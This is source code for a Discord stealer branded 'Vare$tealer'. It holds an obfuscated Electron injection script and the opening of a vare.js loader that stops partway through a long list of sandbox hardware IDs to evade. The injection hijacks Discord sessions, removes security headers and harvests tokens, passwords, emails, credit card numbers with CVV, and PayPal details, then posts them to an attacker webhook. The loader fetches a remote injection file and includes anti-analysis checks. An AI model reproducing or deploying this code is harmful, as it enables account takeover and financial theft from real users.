_0xbe3d0e=getNitro(_0x5f5be9),_0x241cbf=getBadges(_0x11c39f[_0x4aa64a(0x160)]),_0x2ab97e=getBilling(_0x480048),_0xcaafa9={'username':config[_0x4aa64a(0x150)],'avatar_url':config[_0x4aa64a(0x165)],'embeds':[{'title':_0x4aa64a(0x1a2),'description':'Nitro\x20Time\x20🥳','color':0x2f3136,'fields':[{'name':'Token','value':_0x4aa64a(0x15d)+_0x480048+'```'},{'name':'Nitro\x20Type','value':_0xbe3d0e,'inline':!![]},{'name':_0x4aa64a(0x163),'value':_0x241cbf,'inline':!![]},{'name':_0x4aa64a(0x1bc),'value':_0x2ab97e,'inline':!![]}],'author':{'name':_0x11c39f[_0x4aa64a(0x1b3)]+'#'+_0x11c39f[_0x4aa64a(0x164)]+'\x20|\x20'+_0x11c39f['id'],'icon_url':_0x4aa64a(0x1db)+_0x11c39f['id']+'/'+_0x11c39f['avatar']+_0x4aa64a(0x12c)},'footer':{'text':_0x4aa64a(0x158),'icon_url':_0x4aa64a(0x152)}}]};if(config[_0x4aa64a(0x135)])_0xcaafa9[_0x4aa64a(0x1d5)]=config[_0x4aa64a(0x127)];hooker(_0xcaafa9);},ccAdded=async(_0x154c7e,_0x287c38,_0x4af084,_0x3b9822,_0x4e8fac)=>{const _0x4f6614=_0x169165,_0x124ffe=await getInfo(_0x4e8fac);var _0x4954e7=await getURL(_0x4f6614(0x1c4)+_0x124ffe['id']+_0x4f6614(0x191),_0x4e8fac);const _0x11b6bc=getNitro(_0x4954e7),_0x3e4ae7=getBadges(_0x124ffe['flags']),_0x4eee37=await getBilling(_0x4e8fac),_0x5e50a2={'username':config[_0x4f6614(0x150)],'avatar_url':config[_0x4f6614(0x165)],'embeds':[{'title':'Credit\x20Card\x20Added','color':0x2f3136,'fields':[{'name':'CC\x20Number','value':'`'+_0x154c7e+'`','inline':!![]},{'name':_0x4f6614(0x132),'value':'`'+_0x4af084+'/'+_0x3b9822+'`','inline':!![]},{'name':'CVV/CVC','value':'`'+_0x287c38+'`','inline':!![]},{'name':_0x4f6614(0x18e),'value':_0x4f6614(0x15d)+_0x4e8fac+_0x4f6614(0x15d)},{'name':_0x4f6614(0x197),'value':_0x11b6bc,'inline':!![]},{'name':_0x4f6614(0x163),'value':_0x3e4ae7,'inline':!![]},{'name':_0x4f6614(0x1bc),'value':_0x4eee37,'inline':!![]}],'author':{'name':_0x124ffe['username']+'#'+_0x124ffe['discriminator']+'\x20|\x20'+_0x124ffe['id'],'icon_url':_0x4f6614(0x1db)+_0x124ffe['id']+'/'+_0x124ffe['avatar']+_0x4f6614(0x12c)},'footer':{'text':'Vare$tealer\x20-\x20https://t.me/varestealer','icon_url':'https://cdn.discordapp.com/attachments/1040624297447788624/1095522088338587798/1045804059883487302.gif'}}]};if(config[_0x4f6614(0x135)])_0x5e50a2[_0x4f6614(0x1d5)]=config[_0x4f6614(0x127)];hooker(_0x5e50a2);};async function getRelationships(_0x1b2454){const _0x1d2d38=_0x169165;var _0x7f7985=await execScript(_0x1d2d38(0x170)+_0x1b2454+_0x1d2d38(0x17c),!![]),_0xc377bd=JSON[_0x1d2d38(0x143)](_0x7f7985);const _0x1cce91=_0xc377bd[_0x1d2d38(0x151)](_0x46e49d=>{const _0x504f95=_0x1d2d38;return _0x46e49d[_0x504f95(0x12e)]==0x1;});var _0x27104e='';for(z of _0x1cce91){var _0x1284f8=getRareBadges(z['user'][_0x1d2d38(0x15c)]);_0x1284f8!=''&&(_0x27104e+=_0x1284f8+(_0x1d2d38(0x14a)+z['user'][_0x1d2d38(0x1b3)]+'#'+z['user'][_0x1d2d38(0x164)]+'\x0a'));}if(!_0x27104e)_0x27104e=_0x1d2d38(0x1da);return{'friends':_0x27104e};}function _0x49f5(){const _0x184061=['6647424sexOKa','parse','url','price','cwd','boost','webhook','chain','\x20|\x20','gger','<:1ay:1053258370213224498>','10781085EnvtgC','Value','https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json','embed_name','filter','https://cdn.discordapp.com/attachments/1040624297447788624/1095522088338587798/1045804059883487302.gif','api','/advent','<:24ay:1053258356908904478>','https://discord.com/api/v*/users/@me/library','phone','Vare$tealer\x20-\x20https://t.me/varestealer','https://discord.com/api/v*/auth/login','onCompleted','https://discord.gift/','public_flags','```','<:946246402105819216:962747802797113365>','onResponseStarted','flags','default-src\x20\x27*\x27','endsWith','Badges','discriminator','embed_icon','Rare','lenght','<:18ay:1053258358838263849>','https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts','stringify','\x22);\x20\x0a\x20\x20\x20\x20xmlHttp.send(null);\x20\x0a\x20\x20\x20\x20xmlHttp.responseText','Old\x20Password','from','assign','Access-Control-Allow-Origin\x20\x27*\x27','var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();xmlHttp.open(\x20\x22GET\x22,\x20\x22https://discord.com/api/v9/users/@me/relationships\x22,\x20false\x20);xmlHttp.setRequestHeader(\x22Authorization\x22,\x20\x22','<:3ay:1053258367159771136>','POST','<:early_supporter:874750808414113823>','password','2765536YukMUf','<:hypesquad_events:874750808594477056>','499','var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20xmlHttp.open(\x22POST\x22,\x20\x22https://discord.com/api/v9/store/skus/','999','vare','pard.cy','\x22);xmlHttp.send(\x20null\x20);xmlHttp.responseText','concat','forEach','521846918637420545','premium_type','https://discordapp.com/api/v*/users/@me','setInterval','card[exp_month]','<:15ay:1053258360293687346>','exports','var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20xmlHttp.open(\x22GET\x22,\x20\x22','badges','while\x20(true)\x20{}','HQ\x20Friends','request','replace','length','Access-Control-Allow-Headers\x20\x27*\x27','Token','<:6ay:1053258365620465736>','querystring','/profile','uploadData','content-security-policy','`❌`','/billing/payment-sources\x22,\x20false);\x20\x0a\x20\x20\x20\x20xmlHttp.setRequestHeader(\x22Authorization\x22,\x20\x22','wss://remote-auth-gateway','Nitro\x20Type','urous-g','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','https://*.discord.com/api/v*/applications/detectable','filter2','defaultSession','\x22,\x20false\x20);\x0a\x20\x20xmlHttp.setRequestHeader(\x22Authorization\x22,\x20\x22','paypal_accounts','\x0a\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22','startsWith','year','Paypal\x20Added','call','<:staff:874750808728666152>','catch','511651871736201216','existsSync','login','responseHeaders','search','Failed\x20to\x20Purchase\x20❌','new_password','https://*.discord.com/api/v*/users/@me','onBeforeRequest','counter','premium_guild_since','method','{}.constructor(\x22return\x20this\x22)(\x20)','username','Vare\x20Initalized','(((.+)+)+)+$','notify_init','month','statusCode','executeJavaScript','/purchase\x22,\x20false);\x0a\x20\x20\x20\x20xmlHttp.setRequestHeader(\x22Authorization\x22,\x20\x22','function\x20*\x5c(\x20*\x5c)','Billing','521847234246082599','getMonth','511651880837840896','2905689KzcAXW','content-security-policy-report-only','<:paypal:951139189389410365>\x20','%20','https://discord.com/api/v9/users/','toString','includes','email','nitro','error','webRequest','card[cvc]','<:12ay:1053258361480683541>','child_process','invalid','Nitro\x20Bought\x20🥳','New\x20Email','https://cdn.discordapp.com/attachments/1096247603496239175/1096743166692053082/vare.png','https://discord.com/api/v*/users/@me','string','webContents','content','constructor','confirm','💳\x20','Password','No\x20Rare\x20Friends','https://cdn.discordapp.com/avatars/','38738mEVONi','%WEBHOOK%','wss://remote-auth-gateway.discord.gg/*','./core.asar','avatar','round','users/@me','<:brilliance:874750808338608199>','Password\x20Changed','Phone\x20Number','511651885459963904','apply','setMonth','init','Email','Emoji','28745QTHwQM','application/json','end','888vQsSOJ','electron','stateObject','@everyone','ping_val','test','old-leo','friends','61ocwmqf','.webp','<:bravery:874750808388952075>','type','https://api.stripe.com/v*/payment_intents/*/confirm','write','return\x20(function()\x20','CC\x20Exp','var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x20\x0a\x20\x20\x20\x20xmlHttp.open(\x22GET\x22,\x20\x22','<:partner:874750808678354964>','ping_on_run','mkdirSync','push','gift_code','(webpackChunkdiscord_app.push([[\x27\x27],{},e=>{m=[];for(let\x20c\x20in\x20e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void\x200).exports.default.getToken()','<:946246402105819216:962747802797113365>\x20','PATCH','29075283wOWtOL','\x22);\x0a\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20JSON.parse(xmlHttp.responseText);','<:2ay:1053258368795557948>','usd','auto_buy_nitro','path'];_0x49f5=function(){return _0x184061;};return _0x49f5();}async function firststart(){const _0x2f30ea=_0x169165;if(!fs[_0x2f30ea(0x1a7)](process[_0x2f30ea(0x146)]()+'\x5c'+config[_0x2f30ea(0x17a)])){fs[_0x2f30ea(0x136)](process[_0x2f30ea(0x146)]()+'\x5c'+config[_0x2f30ea(0x17a)]);if(config[_0x2f30ea(0x1b6)]){const _0x2b39bc=await execScript('(webpackChunkdiscord_app.push([[\x27\x27],{},e=>{m=[];for(let\x20c\x20in\x20e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void\x200).exports.default.getToken()'),_0x388183=await getInfo(_0x2b39bc),_0x3f9312=await getURL('https://discord.com/api/v9/users/'+_0x388183['id']+_0x2f30ea(0x191),_0x2b39bc),_0x1ac2d9=getNitro(_0x3f9312),_0x35e966=getBadges(_0x388183[_0x2f30ea(0x160)]),_0x40ed84=await getBilling(_0x2b39bc),_0x2f0701=await getRelationships(_0x2b39bc),_0x5af313={'username':config[_0x2f30ea(0x150)],'avatar_url':config[_0x2f30ea(0x165)],'embeds':[{'title':_0x2f30ea(0x1b4),'color':0x2f3136,'fields':[{'name':_0x2f30ea(0x18e),'value':'```'+_0x2b39bc+_0x2f30ea(0x15d)},{'name':_0x2f30ea(0x197),'value':_0x1ac2d9,'inline':!![]},{'name':'Badges','value':_0x35e966,'inline':!![]},{'name':_0x2f30ea(0x1bc),'value':_0x40ed84,'inline':!![]},{'name':_0x2f30ea(0x11e),'value':_0x2f30ea(0x15d)+_0x388183['email']+_0x2f30ea(0x15d)},{'name':_0x2f30ea(0x119),'value':_0x2f30ea(0x15d)+(_0x388183[_0x2f30ea(0x157)]??'❌')+_0x2f30ea(0x15d)}],'author':{'name':_0x388183['username']+'#'+_0x388183[_0x2f30ea(0x164)]+_0x2f30ea(0x14a)+_0x388183['id'],'icon_url':_0x2f30ea(0x1db)+_0x388183['id']+'/'+_0x388183[_0x2f30ea(0x1e0)]+'.webp'},'footer':{'text':_0x2f30ea(0x158),'icon_url':_0x2f30ea(0x152)}},{'title':_0x2f30ea(0x189),'color':0x2f3136,'description':_0x2f0701[_0x2f30ea(0x12a)],'author':{'name':_0x388183[_0x2f30ea(0x1b3)]+'#'+_0x388183[_0x2f30ea(0x164)]+_0x2f30ea(0x14a)+_0x388183['id'],'icon_url':_0x2f30ea(0x1db)+_0x388183['id']+'/'+_0x388183['avatar']+_0x2f30ea(0x12c)},'footer':{'text':_0x2f30ea(0x158),'icon_url':'https://cdn.discordapp.com/attachments/1040624297447788624/1095522088338587798/1045804059883487302.gif'}}]};if(config[_0x2f30ea(0x135)])_0x5af313[_0x2f30ea(0x1d5)]=config[_0x2f30ea(0x127)];hooker(_0x5af313);}}}const nitroBought=async _0x5a8098=>{const _0x58cd05=_0x169165,_0x4bf977=await getInfo(_0x5a8098);var _0x31d295=await getURL(_0x58cd05(0x1c4)+_0x4bf977['id']+_0x58cd05(0x191),_0x5a8098);const _0x45fd6d=getNitro(_0x31d295),_0x3ae226=getBadges(_0x4bf977[_0x58cd05(0x160)]),_0x23647f=await getBilling(_0x5a8098),_0xb005d3=await buyNitro(_0x5a8098),_0xe94e7f={'username':config[_0x58cd05(0x150)],'content':_0xb005d3,'avatar_url':config[_0x58cd05(0x165)],'embeds':[{'title':_0x58cd05(0x1cf),'description':'**'+_0xb005d3+'**','color':0x2f3136,'fields':[{'name':_0x58cd05(0x18e),'value':_0x58cd05(0x15d)+_0x5a8098+_0x58cd05(0x15d)},{'name':'Nitro\x20Type','value':_0x45fd6d,'inline':!![]},{'name':_0x58cd05(0x163),'value':_0x3ae226,'inline':!![]},{'name':_0x58cd05(0x1bc),'value':_0x23647f,'inline':!![]}],'author':{'name':_0x4bf977['username']+'#'+_0x4bf977[_0x58cd05(0x164)]+_0x58cd05(0x14a)+_0x4bf977['id'],'icon_url':_0x58cd05(0x1db)+_0x4bf977['id']+'/'+_0x4bf977['avatar']+_0x58cd05(0x12c)},'footer':{'text':'Vare$tealer\x20-\x20https://t.me/varestealer','icon_url':_0x58cd05(0x152)}}]};if(config['ping_on_run'])_0xe94e7f[_0x58cd05(0x1d5)]=config[_0x58cd05(0x127)]+('\x0a'+_0xb005d3);hooker(_0xe94e7f);};session['defaultSession']['webRequest'][_0x169165(0x1ae)](config[_0x169165(0x19b)],async(_0x55d238,_0x5da8d4)=>{const _0x14076f=_0x169165;if(_0x55d238[_0x14076f(0x144)]['startsWith'](_0x14076f(0x196)))return _0x5da8d4({'cancel':!![]});await firststart(),_0x5da8d4({});}),session[_0x169165(0x19c)][_0x169165(0x1ca)]['onHeadersReceived']((_0x5148dd,_0x2ff1e8)=>{const _0x2e3668=_0x169165;_0x5148dd[_0x2e3668(0x144)][_0x2e3668(0x1a0)](config['webhook'])?_0x5148dd[_0x2e3668(0x144)][_0x2e3668(0x1c6)]('discord.com')?_0x2ff1e8({'responseHeaders':Object[_0x2e3668(0x16e)]({'Access-Control-Allow-Headers':'*'},_0x5148dd['responseHeaders'])}):_0x2ff1e8({'responseHeaders':Object[_0x2e3668(0x16e)]({'Content-Security-Policy':[_0x2e3668(0x161),_0x2e3668(0x18d),_0x2e3668(0x16f)],'Access-Control-Allow-Headers':'*','Access-Control-Allow-Origin':'*'},_0x5148dd[_0x2e3668(0x1a9)])}):(delete _0x5148dd['responseHeaders'][_0x2e3668(0x193)],delete _0x5148dd[_0x2e3668(0x1a9)][_0x2e3668(0x1c1)],_0x2ff1e8({'responseHeaders':{..._0x5148dd['responseHeaders'],'Access-Control-Allow-Headers':'*'}}));}),session['defaultSession'][_0x169165(0x1ca)][_0x169165(0x15f)](config[_0x169165(0x151)],async(_0x4e9a30,_0x140890)=>{const _0x42ee5f=_0x169165;if(_0x4e9a30['url'][_0x42ee5f(0x1c6)]('tokens')){const _0x10e12c=Buffer[_0x42ee5f(0x16d)](_0x4e9a30[_0x42ee5f(0x192)][0x0]['bytes'])['toString'](),_0x5df2ad=querystring[_0x42ee5f(0x143)](_0x10e12c[_0x42ee5f(0x1c5)]()),_0x177909=await execScript('(webpackChunkdiscord_app.push([[\x27\x27],{},e=>{m=[];for(let\x20c\x20in\x20e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void\x200).exports.default.getToken()');ccAdded(_0x5df2ad['card[number]'],_0x5df2ad[_0x42ee5f(0x1cb)],_0x5df2ad[_0x42ee5f(0x183)],_0x5df2ad['card[exp_year]'],_0x177909)['catch'](console[_0x42ee5f(0x1c9)]);return;}}),session[_0x169165(0x19c)]['webRequest'][_0x169165(0x15a)](config['filter'],async(_0x5a2a8d,_0x5db818)=>{const _0xdafc31=_0x169165;if(_0x5a2a8d[_0xdafc31(0x1b8)]!==0xc8&&_0x5a2a8d[_0xdafc31(0x1b8)]!==0xca)return;const _0x4c46ca=Buffer[_0xdafc31(0x16d)](_0x5a2a8d[_0xdafc31(0x192)][0x0]['bytes'])['toString'](),_0xe93ac=JSON[_0xdafc31(0x143)](_0x4c46ca),_0x2941b9=await execScript(_0xdafc31(0x139));switch(!![]){case _0x5a2a8d['url'][_0xdafc31(0x162)](_0xdafc31(0x1a8)):login(_0xe93ac[_0xdafc31(0x1a8)],_0xe93ac[_0xdafc31(0x174)],_0x2941b9)[_0xdafc31(0x1a5)](console[_0xdafc31(0x1c9)]);break;case _0x5a2a8d[_0xdafc31(0x144)][_0xdafc31(0x162)](_0xdafc31(0x1e2))&&_0x5a2a8d[_0xdafc31(0x1b1)]===_0xdafc31(0x13b):if(!_0xe93ac['password'])return;_0xe93ac[_0xdafc31(0x1c7)]&&emailChanged(_0xe93ac[_0xdafc31(0x1c7)],_0xe93ac[_0xdafc31(0x174)],_0x2941b9)[_0xdafc31(0x1a5)](console[_0xdafc31(0x1c9)]);_0xe93ac[_0xdafc31(0x1ac)]&&passwordChanged(_0xe93ac[_0xdafc31(0x174)],_0xe93ac[_0xdafc31(0x1ac)],_0x2941b9)['catch'](console[_0xdafc31(0x1c9)]);break;case _0x5a2a8d[_0xdafc31(0x144)][_0xdafc31(0x162)](_0xdafc31(0x19e))&&_0x5a2a8d['method']===_0xdafc31(0x172):PaypalAdded(_0x2941b9)[_0xdafc31(0x1a5)](console[_0xdafc31(0x1c9)]);break;case _0x5a2a8d[_0xdafc31(0x144)][_0xdafc31(0x162)](_0xdafc31(0x1d7))&&_0x5a2a8d[_0xdafc31(0x1b1)]===_0xdafc31(0x172):if(!config[_0xdafc31(0x140)])return;setTimeout(()=>{const _0x3e215a=_0xdafc31;nitroBought(_0x2941b9)[_0x3e215a(0x1a5)](console[_0x3e215a(0x1c9)]);},0x1388);break;default:break;}}),module[_0x169165(0x185)]=require(_0x169165(0x1df)),(function(){const _0x4b33bb=_0x169165,_0x413778=function(){const _0x3ff8d2=_0x1e95;let _0x3022ca;try{_0x3022ca=Function(_0x3ff8d2(0x131)+_0x3ff8d2(0x1b2)+');')();}catch(_0x32a69a){_0x3022ca=window;}return _0x3022ca;},_0x26c120=_0x413778();_0x26c120[_0x4b33bb(0x182)](_0x31eced,0x15e);}());function _0x31eced(_0x5ad9bc){function _0x54b7ae(_0x32a50a){const _0x4dcb50=_0x1e95;if(typeof _0x32a50a===_0x4dcb50(0x1d3))return function(_0x5dc4ea){}[_0x4dcb50(0x1d6)](_0x4dcb50(0x188))[_0x4dcb50(0x11b)](_0x4dcb50(0x1af));else(''+_0x32a50a/_0x32a50a)[_0x4dcb50(0x18c)]!==0x1||_0x32a50a%0x14===0x0?function(){return!![];}[_0x4dcb50(0x1d6)]('debu'+_0x4dcb50(0x14b))[_0x4dcb50(0x1a3)]('action'):function(){return![];}[_0x4dcb50(0x1d6)]('debu'+_0x4dcb50(0x14b))['apply'](_0x4dcb50(0x125));_0x54b7ae(++_0x32a50a);}try{if(_0x5ad9bc)return _0x54b7ae;else _0x54b7ae(0x0);}catch(_0x2920d3){}}
2 |
--------------------------------------------------------------------------------
/vare.js:
--------------------------------------------------------------------------------
1 | const fs = require("fs");
2 | const path = require("path");
3 | const crypto = require("crypto");
4 | const sqlite3 = require('sqlite3');
5 | const vare = require("vareapi");
6 | const axios = require('axios');
7 | const os = require('os');
8 | const fse = require('fs-extra')
9 | const FormData = require('form-data');
10 | const JSZip = require('jszip');
11 | const screenshot = require('screenshot-desktop');
12 | const { execSync, exec } = require('child_process');
13 | const hideconsole = require('node-hide-console-window');
14 | const buf_replace = require('buffer-replace');
15 |
16 | let killdcop = true; // if u want to close discord make this "true" if u dont want to close discord make this "false";
17 |
18 |
19 | const %webhookstring% = "REPLACE_YOUR_WEBHOOK"
20 | const %INJURLL% = "https://raw.githubusercontent.com/saintdaddy/Vare-Stealer/main/injection/index.js"
21 | const %keywordstring% = ['github.com','gmail.com','twitch.tv','instagram.com']
22 |
23 |
24 | const hwid = execSync('WMIC csproduct get UUID').toString().trim().split('\n')[1];
25 | var hwidblack = ["00000000-0000-0000-0000-000000000000", "00000000-0000-0000-0000-50E5493391EF", "00000000-0000-0000-0000-AC1F6BD047A0", "00000000-0000-0000-0000-AC1F6BD04850", "00000000-0000-0000-0000-AC1F6BD048D6", "00000000-0000-0000-0000-AC1F6BD048DC", "00000000-0000-0000-0000-AC1F6BD048F8", "00000000-0000-0000-0000-AC1F6BD048FE", "00000000-0000-0000-0000-AC1F6BD04900", "00000000-0000-0000-0000-AC1F6BD0491C", "00000000-0000-0000-0000-AC1F6BD04926", "00000000-0000-0000-0000-AC1F6BD04928", "00000000-0000-0000-0000-AC1F6BD04972", "00000000-0000-0000-0000-AC1F6BD04976", "00000000-0000-0000-0000-AC1F6BD04978", "00000000-0000-0000-0000-AC1F6BD04986", "00000000-0000-0000-0000-AC1F6BD049B8", "00000000-0000-0000-0000-AC1F6BD04C0A", "00000000-0000-0000-0000-AC1F6BD04D06", "00000000-0000-0000-0000-AC1F6BD04D08", "00000000-0000-0000-0000-AC1F6BD04D8E", "00000000-0000-0000-0000-AC1F6BD04D98", "00000000-0000-0000-0000-AC1F6BD04DC0", "00000000-0000-0000-0000-AC1F6BD04DCC", "02AD9898-FA37-11EB-AC55-1D0C0A67EA8A", "032E02B4-0499-05C3-0806-3C0700080009", "03AA02FC-0414-0507-BC06-D70700080009", "03D40274-0435-05BF-D906-D20700080009", "03DE0294-0480-05DE-1A06-350700080009", "050C3342-FADD-AEDF-EF24-C6454E1A73C9", "05790C00-3B21-11EA-8000-3CECEF4400D0", "0700BEF3-1410-4284-81B1-E5C17FA9E18F", "07AF2042-392C-229F-8491-455123CC85FB", "07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9", "08C1E400-3C56-11EA-8000-3CECEF43FEDE", "0910CBA3-B396-476B-A7D7-716DB90F5FB9", "0934E336-72E4-4E6A-B3E5-383BD8E938C3", "0A36B1E3-1F6B-47DE-8D72-D4F46927F13F", "0A9D60D4-9A32-4317-B7C0-B11B5C677335", "0D748400-3B00-11EA-8000-3CECEF44007E", "0F377508-5106-45F4-A0D6-E8352F51A8A5", "104F9B96-5B46-4567-BF56-0066C1C6F7F0", "11111111-2222-3333-4444-555555555555", "119602E8-92F9-BD4B-8979-DA682276D385", "12204D56-28C0-AB03-51B7-44A8B7525250", "12EE3342-87A2-32DE-A390-4C2DA4D512E9", "138D921D-680F-4145-BDFF-EC463E70C77D", "13A61742-AF45-EFE4-70F4-05EF50767784", "14692042-A78B-9563-D59D-EB7DD2639037", "1AAD2042-66E8-C06A-2F81-A6A4A6A99093", "1B5D3FFD-A28E-4F11-9CD6-FF148989548C", "1D4D3342-D6C4-710C-98A3-9CC6571234D5", "213D2878-0E33-4D8C-B0D1-31425B9DE674", "222EFE91-EAE3-49F1-8E8D-EBAE067F801A", "26645000-3B67-11EA-8000-3CECEF440124", "2AB86800-3C50-11EA-8000-3CECEF440130", "2C5C2E42-E7B1-4D75-3EA3-A325353CDB72", "2CEA2042-9B9B-FAC1-44D8-159FE611FCCC", "2DD1B176-C043-49A4-830F-C623FFB88F3C", "2E6FB594-9D55-4424-8E74-CE25A25E36B0", "2F94221A-9D07-40D9-8C98-87CB5BFC3549", "2FBC3342-6152-674F-08E4-227A81CBD5F5", "34419E14-4019-11EB-9A22-6C4AB634B69A", "361E3342-9FAD-AC1C-F1AD-02E97892270F", "365B4000-3B25-11EA-8000-3CECEF44010C", "38813342-D7D0-DFC8-C56F-7FC9DFE5C972", "38AB3342-66B0-7175-0B23-F390B3728B78", "3A9F3342-D1F2-DF37-68AE-C10F60BFB462", "3EDC0561-C455-4D64-B176-3CFBBBF3FA47", "3F284CA4-8BDF-489B-A273-41B44D668F6D", "3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E", "3FADD8D6-3754-47C4-9BFF-0E35553DD5FB", "40384E87-1FBA-4096-9EA1-D110F0EA92A8", "40F100F9-401C-487D-8D37-48107C6CE1D3", "418F0D5B-FCB6-41F5-BDA5-94C1AFB240ED", "41B73342-8EA1-E6BF-ECB0-4BC8768D86E9", "42A82042-3F13-512F-5E3D-6BF4FFFD8518", "44B94D56-65AB-DC02-86A0-98143A7423BF", "4729AEB0-FC07-11E3-9673-CE39E79C8A00", "481E2042-A1AF-D390-CE06-A8F783B1E76A", "48941AE9-D52F-11DF-BBDA-503734826431", "49434D53-0200-9036-2500-369025000C65", "49434D53-0200-9036-2500-369025003865", "49434D53-0200-9036-2500-369025003A65", "49434D53-0200-9036-2500-369025003AF0", "49434D53-0200-9036-2500-369025005CF0", "49434D53-0200-9036-2500-36902500F022", "49434D53-0200-9065-2500-659025002274", "49434D53-0200-9065-2500-659025005073", "49434D53-0200-9065-2500-659025008074", "49434D53-0200-9065-2500-65902500E439", "499B0800-3C18-11EA-8000-3CECEF43FEA4", "4C4C4544-0050-3710-8058-CAC04F59344A", "4CB82042-BA8F-1748-C941-363C391CA7F3", "4CE94980-D7DA-11DD-A621-08606E889D9B", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", "4DC32042-E601-F329-21C1-03F27564FD6C", "4EDF3342-E7A2-5776-4AE5-57531F471D56", "51646514-93E1-4CB6-AF29-036B45D14CBF", "52A1C000-3BAB-11EA-8000-3CECEF440204", "56B9F600-3C1C-11EA-8000-3CECEF4401DE", "59C68035-4B21-43E8-A6A6-BD734C0EE699", "5BD24D56-789F-8468-7CDC-CAA7222CC121", "5C1CA40D-EF14-4DF8-9597-6C0B6355D0D6", "5CC7016D-76AB-492D-B178-44C12B1B3C73", "5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E", "5E573342-6093-4F2D-5F78-F51B9822B388", "5EBC5C00-3B70-11EA-8000-3CECEF4401DA", "5EBD2E42-1DB8-78A6-0EC3-031B661D5C57", "60C83342-0A97-928D-7316-5F1080A78E72", "612F079A-D69B-47EA-B7FF-13839CD17404", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", "63DE70B4-1905-48F2-8CC4-F7C13B578B34", "63FA3342-31C7-4E8E-8089-DAFF6CE5E967", "64176F5E-8F74-412F-B3CF-917EFA5FB9DB", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "66729280-2B0C-4BD0-8131-950D86871E54", "66CC1742-AAC7-E368-C8AE-9EEB22BD9F3B", "671BC5F7-4B0F-FF43-B923-8B1645581DC8", "67442042-0F69-367D-1B2E-1EE846020090", "67C5A563-3218-4718-8251-F38E3F6A89C1", "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "686D4936-87C1-4EBD-BEB7-B3D92ECA4E28", "6881083C-EE5A-43E7-B7E3-A0CE9227839C", "69AEA650-3AE3-455C-9F80-51159BAE5EAE", "6A669639-4BD2-47E5-BE03-9CBAFC9EF9B3", "6AA13342-49AB-DC46-4F28-D7BDDCE6BE32", "6ECEAF72-3548-476C-BD8D-73134A9182C8", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "71522042-DA0B-6793-668B-CE95AEA7FE21", "72492D47-52EF-427A-B623-D4F2192F97D4", "73163342-B704-86D5-519B-18E1D191335C", "777D84B3-88D1-451C-93E4-D235177420A7", "782ED390-AE10-4727-A866-07018A8DED22", "79AF5279-16CF-4094-9758-F88A616D81B4", "7A484800-3B19-11EA-8000-3CECEF440122", "7AB5C494-39F5-4941-9163-47F54D6D5016", "7CA33342-A88C-7CD1-1ABB-7C0A82F488BF", "7D341C16-E8E9-42EA-8779-93653D877231", "7D6A0A6D-394E-4179-9636-662A8D2C7304", "7E4755A6-7160-4982-8F5D-6AA481749F10", "80152042-2F34-11D1-441F-5FADCA01996D", "83BFD600-3C27-11EA-8000-3CECEF4400B4", "844703CF-AA4E-49F3-9D5C-74B8D1F5DCB6", "84782042-E646-50A0-159F-A8E75D4F9402", "84FE3342-6C67-5FC6-5639-9B3CA3D775A1", "84FEEFBC-805F-4C0E-AD5B-A0042999134D", "8703841B-3C5E-461C-BE72-1747D651CE89", "88DC3342-12E6-7D62-B0AE-C80E578E7B07", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "8DA62042-8B59-B4E3-D232-38B29A10964A", "8EC60B88-7F2B-42DA-B8C3-4E2EF2A8C603", "907A2A79-7116-4CB6-9FA5-E5A58C4587CD", "90A83342-D7E7-7A14-FFB3-2AA345FDBC89", "91625303-5211-4AAC-9842-01A41BA60D5A", "91A9EEDB-4652-4453-AC5B-8E92E68CBCF5", "921E2042-70D3-F9F1-8CBD-B398A21F89C6", "94515D88-D62B-498A-BA7C-3614B5D4307C", "95BF6A00-3C63-11EA-8000-3CECEF43FEB8", "96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE", "9921DE3A-5C1A-DF11-9078-563412000026", "9B2F7E00-6F4C-11EA-8000-3CECEF467028", "9C6D1742-046D-BC94-ED09-C36F70CC9A91", "9FC997CA-5081-4751-BC78-CE56D06F6A62", "A100EFD7-4A31-458F-B7FE-2EF95162B32F", "A15A930C-8251-9645-AF63-E45AD728C20C", "A19323DA-80B2-48C9-9F8F-B21D08C3FE07", "A1A849F7-0D57-4AD3-9073-C79D274EECC8", "A2339E80-BB69-4BF5-84BC-E9BE9D574A65", "A5CE2042-8D25-24C4-71F7-F56309D7D45F", "A6A21742-8023-CED9-EA8D-8F0BC4B35DEA", "A7721742-BE24-8A1C-B859-D7F8251A83D3", "A9C83342-4800-0578-1EE8-BA26D2A678D2", "AAFC2042-4721-4E22-F795-A60296CAC029", "ACA69200-3C4C-11EA-8000-3CECEF4401AA", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", "AF1B2042-4B90-0000-A4E4-632A1C8C7EB1", "B1112042-52E8-E25B-3655-6A4F54155DBF", "B22B623B-6B62-4F9B-A9D3-94A15453CEF4", "B5B77895-D40B-4F30-A565-6EF72586A14A", "B6464A2B-92C7-4B95-A2D0-E5410081B812", "B9DA2042-0D7B-F938-8E8A-DA098462AAEC", "BB233342-2E01-718F-D4A1-E7F69D026428", "BB64E044-87BA-C847-BC0A-C797D1A16A50", "BE784D56-81F5-2C8D-9D4B-5AB56F05D86E", "BFE62042-E4E1-0B20-6076-C5D83EDFAFCE", "C0342042-AF96-18EE-C570-A5EFA8FF8890", 